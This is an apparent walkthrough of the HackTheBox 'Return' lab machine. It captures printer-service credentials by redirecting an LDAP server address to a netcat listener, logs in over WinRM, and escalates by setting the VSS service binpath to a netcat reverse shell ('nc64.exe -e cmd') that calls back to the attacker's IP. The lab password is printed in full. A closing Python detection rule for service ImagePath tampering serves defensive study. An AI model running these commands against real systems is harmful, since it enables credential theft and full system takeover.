Return
An easy Windows box from HackTheBox, using an SSRF to capture a password, then modifying a service path to get SYSTEM.
Recon
Start with the usual full-port nmap scan with version detection
sudo nmap -p- -sV -oA nmap/return 10.10.11.108
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-20 02:33:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Run an initial crackmapexec against SMB to confirm the OS build, hostname and domain
kali@kali-$ crackmapexec smb 10.10.11.108
SMB 10.10.11.108 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
Browsing to the IP on port 80 also shows a printer settings page, which includes a server address, username and password field.
Exploitation
The password field is masked in the page, but the settings form lets you change the server address the printer authenticates to. Entering the Kali machine's IP there and listening with netcat on port 389 captures the credentials in cleartext when you hit the Update button.
nc -lnvp 389
listening on [any] 389 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 63570
0*`%return\svc-printer
1edFg43012!!
We now have both a username and a password: svc-printer:1edFg43012!!
Port 5985 (WinRM) is open, so evil-winrm with those credentials gives a PowerShell prompt on the box
evil-winrm -u svc-printer -p '1edFg43012!!' 10.10.11.108
The user flag is on the desktop of svc-printer.
Enumerating the groups the user belongs to shows that svc-printer is a member of BUILTIN\Server Operators, a group that is allowed to start, stop and reconfigure services
*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Next, upload a netcat binary (nc64.exe) to the box so it can be used to set up a reverse shell as Administrator
*Evil-WinRM* PS C:\Users\svc-printer> upload nc64.exe
Ideally we would list the services the user can modify, but svc-printer is not allowed to query the service control manager with sc.exe
*Evil-WinRM* PS C:\Users\svc-printer> sc.exe query
[SC] OpenSCManager FAILED 5:
Access is denied.
Instead, modify a service that we already know exists on every Windows host, VSS (Volume Shadow Copy), and replace its binary path with a command that launches the uploaded netcat as a reverse shell
*Evil-WinRM* PS C:\Users\svc-printer> sc.exe config VSS binpath="C:\Users\svc-printer\nc64.exe -e cmd 10.10.14.11 8000"
Then stop the service so that the new binary path is used on the next start
sc.exe stop VSS
Start a netcat listener on port 8000 on the Kali machine, then start the service. Because the VSS service runs as LocalSystem, the shell that connects back runs as SYSTEM
sc.exe start VSS
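From the defender's side, the step above changes the service's ImagePath value in the registry, which Sysmon records as a RegistryEvent (Event ID 13) written by services.exe, and the `sc.exe config` call itself shows up as a process creation (Event ID 1). The following detection logic is an added example, not part of the original writeup; the sample events are constructed, and the list of trusted service directories is an assumption to tune per environment.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample Sysmon records (not real logs), flattened to key/value
# dicts the way a SIEM would hand them over.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "13", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath",
     "Details": "C:\\Users\\svc-printer\\nc64.exe -e cmd 10.10.14.11 8000"},
    {"EventID": "13", "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": "1", "Image": "C:\\Windows\\System32\\sc.exe", "User": "RETURN\\svc-printer",
     "CommandLine": 'sc.exe config VSS binpath="C:\\Users\\svc-printer\\nc64.exe -e cmd 10.10.14.11 8000"'},
]

# Assumption: legitimate service binaries live under these directories.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def service_exe(image_path: str) -> str:
    """Return the executable named by a service ImagePath value, without arguments."""
    p = image_path.strip()
    exe = p[1:p.find('"', 1)] if p.startswith('"') else p.split(" ", 1)[0]
    # Normalise the prefixes commonly seen in ImagePath values to absolute lowercase paths.
    exe = exe.lower().replace("%systemroot%", "c:\\windows")
    if exe.startswith("\\systemroot\\"):
        exe = "c:\\windows" + exe[len("\\systemroot"):]
    if exe.startswith("system32\\"):  # driver-style path relative to the Windows directory
        exe = "c:\\windows\\" + exe
    return exe


def service_path_alerts(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Flag ImagePath rewrites to untrusted locations and sc.exe reconfiguration commands."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        if ev.get("EventID") == "13" and ev["TargetObject"].lower().endswith("\\imagepath"):
            service = ev["TargetObject"].split("\\")[-2]
            exe = service_exe(ev["Details"])
            if not exe.startswith(TRUSTED_DIRS):
                alerts.append(("ImagePath outside trusted dirs", f"{service} -> {exe}"))
        elif ev.get("EventID") == "1" and ev["Image"].lower().endswith("\\sc.exe"):
            if re.search(r"\bconfig\b.*\bbinpath\s*=", ev.get("CommandLine", ""), re.I):
                alerts.append(("sc.exe service reconfiguration", f'{ev["User"]}: {ev["CommandLine"]}'))
    return alerts


if __name__ == "__main__":
    for rule, detail in service_path_alerts(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Either rule alone is noisy in environments with legitimate installers; correlating the two within a short window, or restricting the second rule to non-administrative accounts such as Server Operators members, gives a much cleaner signal.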